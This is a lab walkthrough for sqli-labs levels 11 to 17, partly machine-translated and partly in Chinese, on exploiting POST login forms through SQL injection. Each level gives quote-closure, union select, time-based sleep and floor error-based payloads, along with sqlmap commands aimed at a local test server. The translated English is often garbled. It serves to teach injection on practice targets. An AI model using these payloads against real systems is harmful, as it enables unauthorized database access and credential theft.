This involves a few off-type data at all post injection, and get injected into the type of difference is not the same test point, the method is the same
0x01 sqli-labs less-11
1. Hand
Since the injection type is a post, we can not enter in the url, the following we input data in the form, the request is part of post-type data, can also capture, part of the data sql statement injection
We enter the username at 1 ', password at any input, find sql statement error report
Then there is a username at the sql injection, we keep up with comments - + found echo error, to keep up with #, found echo normal, so successful closure
'Order by 3 # error,' order by 2 # normal display
Query the database 'union select database (), 2 #
As with the first pass back operation
2.sqlmap injection
Burp with capture, then, you need to keep data SqlMap data portion
sqlmap statement:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=1&passwd=11&submit=Submit"
--technique SIU
--dbms mysql --dbs --threads 8
one of them:
--data: data segments may be added later (POST / GET types are possible)
--threads: Maximum number of concurrent threads, each acquiring a character (this request 7) is blind, after the end of the thread for the completion, The default is 1, it is recommended not to exceed 10, otherwise it may affect the availability of the site
--Batch here without a reason, because there is no option to choose
Or very slow
0x02 sqli-labs less-12
1. Hand Note
1 inputs the username ', pssword at any input, there is no error, the input 1 ", error, then the error should be double quotes
With the # comment, or error, is not closed, to see the error message found in brackets,
So parentheses, username is: 1 ") #, password any input, correct echo, then try union select,
After the normal operation
2.sqlmap injection
We will try out manually closed except rules (universal code) comment character data is filled into corresponding parameter which
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname=")or ("1")=("1&passwd=1")or("1")=("1&submit=Submit" --technique US --dbms mysql --dbs --threads 8
0x03 sqli-labs less-13
1. Hand Note
Closure rule is: ') #
Input ') union select 1,2 #, the display position is not found, but the error message, so a given injection floor
Given later injected normal operation
2.sqlmap injection
We need to enter data in a regular injection of two parameters universal password, crack faster
0x04 sqli-labs less-14
1. Hand Note
输入”,报sql错误,输入“#成功闭合,因此闭合规则为:"#
在规则里面写入union select 1,2,正确查询没有显示,只会报错,因此同样采用报错注入
后面常规报错注入操作
2.sqlmap注入
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-14/?id=1" --data "uname=1&passwd=1&submit=Submit" --dbs --threads 8 --technique E --dbms mysql
0x05 sqli-labs less-15
1.手注
没有报错信息,试试1’and sleep(5)#也不行
应该是要登录用户名正确才行,试试admin'and sleep(5)#,发现延时5秒
参考第9关时间盲注的操作
2.sqlmap注入
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=admin'or'1'='1&passwd='or'1'='1&submit=Submit" --current-db --threads 8 --technique T 或者 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=admin&passwd=1&submit=Submit" --current-db --threads 8 --technique T
0x06 sqli-labs less-16
将闭合规则的‘换成“,后面操作同15关
0x07 sqli-labs less-17
1.手注
单双引号在user name里面没有报错,那么看源码
没有对password进行检查,但是先检查的是uname,因此我们用户名必须正确,这里选择爆破,爆出用户名。这里用户名是admin
那么用户名处填入admin,密码处填入’报错,填入’#,正常显示,正常显示没有回显位,因此采用floor报错注入
构造语句:’ and (select 1 from (select count(*),concat((database()),floor (rand(0)*2))x from information_schema.tables group by x)a)#
后面报错注入的常规操作
2.sqlmap注入
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-17/" --data "uname=admin&passwd=password&submit=Submit" --current-db --threads 8 --technique E
